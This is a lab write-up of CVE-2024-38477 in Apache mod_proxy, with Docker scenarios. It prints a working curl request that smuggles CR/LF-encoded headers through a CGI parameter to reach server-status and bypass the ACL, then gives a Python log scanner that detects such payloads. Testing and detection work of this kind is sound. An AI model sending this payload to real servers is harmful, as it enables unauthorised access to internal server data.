# Introduction

This project provides a write-up of **CVE-2024-38477**. To avoid crashing a production environment, the project contains two scenarios with a vulnerable Apache2 mod_proxy. These scenarios can be deployed with Docker.

This project contains a **Proof of Concept**: a Python script that executes the attack against the server.

## Scenarios
### Scenario 1

The first scenario is a Perl script that can be executed with Apache's CGI module. For testing, I created a Perl script that lists all directories and files in the path specified as an argument. The scenario can be deployed with Docker:

```
$ docker build -t cve-cgi scenario1/
$ docker run -p 8080:80 cve-cgi
```

With a simple curl request, you can perform an SSRF attack against the Apache server and bypass the ACL:

```
$ curl "http://localhost:8080/cgi-bin/listings.cgi?r=http://%0d%0aLocation%3a/badpage%0d%0aContent-Type:server-status%0d%0a%0d%0a"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for localhost (via 172.17.0.2)</h1>
```
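
One way to spot requests like the curl above in an Apache access log, as an added example that is not part of the original project: it flags query parameters whose percent-decoded value contains a CR/LF followed by a response header name. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Header names seen in the curl request above (Location, Content-Type),
# plus the CGI Status header, appearing right after an injected CR/LF.
INJECTED_HEADER = re.compile(r"[\r\n]+\s*(location|content-type|status)\s*:", re.I)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded %250d%250a is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return query parameter names whose decoded value injects a header line."""
    query = target.partition("?")[2]
    hits = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if INJECTED_HEADER.search(decode_fully(raw)):
            hits.append(name)
    return hits

def scan(log_lines):
    """Yield (line_number, target, params) for access-log lines worth triage."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_LINE.search(line)
        if match:
            params = suspicious_params(match.group("target"))
            if params:
                yield number, match.group("target"), params

# Constructed sample log lines (common log format), not captured traffic.
SAMPLE_LOG = [
    '172.17.0.1 - - [01/Jan/2025:10:00:00 +0000] "GET /cgi-bin/listings.cgi?r=/tmp HTTP/1.1" 200 512',
    '172.17.0.1 - - [01/Jan/2025:10:00:05 +0000] "GET /cgi-bin/listings.cgi?r=http://%0d%0aLocation%3a/badpage%0d%0aContent-Type:server-status%0d%0a%0d%0a HTTP/1.1" 200 4096',
    '172.17.0.1 - - [01/Jan/2025:10:00:09 +0000] "GET /index.html?q=a%250d%250aLocation%253a/x HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for number, target, params in scan(SAMPLE_LOG):
        print(f"line {number}: header injection in {params}: {target}")
```

The same check can run as input validation in front of the CGI script, rejecting any parameter for which `suspicious_params` returns a hit.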

### Scenario 2

The second scenario is a Python script executed with the CGI module.

## PoC
The Python script **cve.py** generates a new hostname using random values (ASCII letters, digits, and special characters) and sends it to the server.